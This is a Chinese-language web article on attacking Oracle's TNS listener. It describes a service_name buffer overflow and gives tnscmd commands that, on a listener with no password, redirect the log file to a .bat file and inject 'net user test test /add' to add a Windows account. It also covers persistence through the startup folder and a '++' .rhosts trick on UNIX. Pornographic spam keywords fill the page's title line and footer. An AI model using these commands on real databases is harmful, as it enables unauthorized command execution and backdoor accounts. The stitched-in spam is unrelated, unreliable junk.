国产成人精品久久免费动漫-国产成人精品天堂-国产成人精品区在线观看-国产成人精品日本-a级毛片无码免费真人-a级毛片毛片免费观看久潮喷

您的位置:首頁技術文章
文章詳情頁

針對Oracle的TNS listener攻擊方法整理

瀏覽:100日期:2023-11-23 12:34:44

首先,根據版本的不同,TNS listener可能較易受到多種類型的緩沖區溢出攻擊,這些攻擊可以在不提供用戶ID和口令的情況下被利用。例如:在oracle 9i中,當客戶機請求某個過長的service_name時,很容易受到溢出攻擊。當listener為日志構建錯誤消息之后,service_name的值會被復制到某于棧結構的緩沖區內,從而引起溢出—覆蓋保存值將返回棧中的地址。這種做法可以使攻擊者獲得控制權。事實上,TNS listener曾經有過多次溢出和格式化字符串的漏洞。

其次,另一類攻擊和日志文件有關。只有當未給listener設置口令的時候,攻擊才會有效。

假設某個listener沒有設置口令,攻擊方法如下:

tnscmd -h www.example.com -p 1521 –rawcmd “(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_directory)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=c:)))” 將日志目錄設置到C盤

tnscmd -h www.example.com -p 1521 –rawcmd “(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=test.bat)))” 將日志文件設置為test.bat

tnscmd -h www.example.com –rawcmd “(CONNECT_DATA=(( ||dir >test.txt||net user test test /add))”該命令把

dir >test.txt、net user test test /add命令寫入c:test.bat文件,由于雙豎線的作用(第一條命令執行失敗后,WINDOWS命令解釋器執行后面的命令)把錯誤的信息注釋掉, 從而可以執行我們提交的命令。

通過設置日志文件到不同的目錄,例如WINDOWS的啟動目錄,當服務器重啟將執行惡意用戶提交的特定代碼,從而對系統造成威脅。

運行于UNIX系統上的oracle也會受到同樣的威脅。其中一種方法就是將“++”回送給.rhost文件,當系統運行時,使用r*services命令。

標簽: Oracle 數據庫
主站蜘蛛池模板: 手机看片久久青草福利盒子 | 亚洲午夜片子大全精品 | 久久久日本久久久久123 | 成人全黄三级视频在线观看 | 国产精品夜色视频一区二区 | 久久久久久久久久久久久久久久久久 | 亚洲人成网站在线在线 | 免费看片aⅴ免费大片 | 国产欧美成人免费观看视频 | 色女生影院| 国产精品亚洲精品久久成人 | 暖暖免费高清日本一区二区三区 | 男人和女人在床做黄的网站 | 国产黄色a三级三级三级 | aaaaaa精品视频在线观看 | 波多野吉衣 免费一区 | 黄色三级视频在线播放 | 手机在线一区二区三区 | 91九色国产porny | a级国产乱理伦片在线观看 a级国产乱理伦片在线观看99 | 亚洲男人的天堂在线 | 亚洲特级黄色片 | 日韩午夜在线视频不卡片 | 免费欧美一级片 | 91精品国产一区二区三区四区 | 日本人在线看片 | 国产高清在线看免费视频观 | 亚洲精品国产美女在线观看 | 扒开双腿猛进入爽爽在线观看 | 亚洲精品一区二区 | 精品日韩欧美一区二区三区在线播放 | 国产亚洲精品久久久久久无 | 国产高清视频a在线大全 | 亚洲六月丁香六月婷婷蜜芽 | 91av视频 | 成人毛片18女人毛片免费 | 精品午夜久久网成年网 | 日本三级香港三级人妇r | 久久成人国产 | 九九视频在线看精品 | 青木玲中文字幕一区二区 |